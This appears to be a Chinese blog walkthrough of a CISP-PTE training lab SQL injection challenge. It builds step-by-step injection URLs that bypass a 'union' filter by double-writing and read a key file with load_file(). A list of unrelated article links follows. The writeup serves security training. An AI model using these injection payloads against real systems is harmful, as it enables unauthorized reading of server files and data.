当前位置: 首页 > news >正文

cisp-pte之SQL注入题之vulnerabilities/fu1.php?id=1

1、审题

通过这个内容可以知道key就在/tmp/360/key文件里面,那么如何能够拿到key,那就需要能够把/tmp/360/key读取出来,所以第一时间想到的函数就是load_file()

2、探测

接下来就开始一步步探测

1、and探测

http://192.168.169.100:81/vulnerabilities/fu1.php?id=1%20and%201=1

从图片可以看出id后面有一个括号,所以接下来需要让括号闭合

2、闭合探测

http://192.168.169.100:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=1

发现括号倒是闭合啦,但是页面没返回数据,没事,继续探测

3、union探测

接下来探测一下有多少个字段,首先考虑的是联合查询

http://192.168.169.100:81/vulnerabilities/fu1.php?id=1')/**/and/**/1=2/**/union/**/select/**/1,2,3%23

发现union被过滤掉了

4、union双写探测

http://192.168.169.100:81/vulnerabilities/fu1.php?id=1')/**/and/**/1=2/**/uniunionon/**/select/**/1,2,3%23

这里union虽然被过滤了,但是剩下的前后部分正好组合成了一个新的union

5、字段数探测

上面3个字段没返回数据,试试4个

http://192.168.169.100:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=2/**/uniunionon/**/select/**/1,2,3,4%23

太好了,这里终于露出了破绽,标题分别是2,作者分别是4,内容分别是3

接下来尝试在标题,也就是2的位置加载/tmp/360/key,因为我们的目的是拿到这个key

3、拿key

继续构造查询语句,从上面我们已经知道,这个表有4个字段,那么继续使用union联合查询,并且按照4个字段进行查询,只是在标题2的位置我们通过load_file查询key

http://192.168.169.100:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=2/**/uniunionon/**/select/**/1,load_file(%27/tmp/360/key%27),3,4%23

从图片可以看出,我们轻松就拿到了key

这里需要特别强调一下,为什么后面会有%23,因为这是#的url编码,从种种迹象表明数据库是mysql,而不是mssql,如果是mssql需要用--,而不是#,所以最后这里加上#是为了注释掉后面的内容,防止有sql语法错误,sql语句不能正确执行

http://www.dtcms.com/a/602453.html

相关文章:

  • 发布三小时,GitHub标星11K,华为内部的图解网络笔记限时开源
  • 【electron】解决CS里的全屏问题
  • 手机网站建站软件毕设做桌面软件 网站
  • 【1.8】基于FPGA的costas环开发2——解调端下变频模块
  • 电商培训机构哪家好网站优化一年多少钱
  • 专业手机网站建设设计软文案例400字
  • pyautocad 获取obb最小包围矩形后旋转平行后标注长宽
  • Google ADK、OpenAI Agents SDK 和 AgentScope的详细对比
  • 深入解析MySQL数据库报错:`ERROR 1146 (42S02) Table ‘mysql.user‘ doesn‘t exist`
  • 用C语言编写有趣程序 | 探索如何用编程创造乐趣与实用工具
  • 武城网站建设公司谷歌广告代理商
  • Docker是什么?怎么安装与配置?
  • 搭建网站的步骤wordpress地址改不了
  • 手机网站报价表网站建设规划书实训报告
  • (Linux操作系统)MySQL在Centos7环境安装和MySQL数据库基础
  • UCOS-III笔记(三)
  • 如何自己建设简单的手机网站品牌创意网站建设
  • 关于csdn隐私
  • 数据集结构说明(Dataset)
  • C语言源程序经过编译
  • 建设工程英语网站单位做网站费用怎么记账
  • 做网站需要注册什么类型的公司台州市建设施工图审图网站
  • 文献——总结
  • spring多配置文件
  • 数据结构与算法篇-Prim最小生成树算法
  • 北京网站设计制作过程网站举报后还是没封掉
  • 手机端网站需要多少钱高端网站建设上
  • 互动营销型网站建设wordpress 全站搜索
  • 配色相关网站建个企业网站备案需要多长时间
  • 山西网站建设找哪家平谷网站建设服务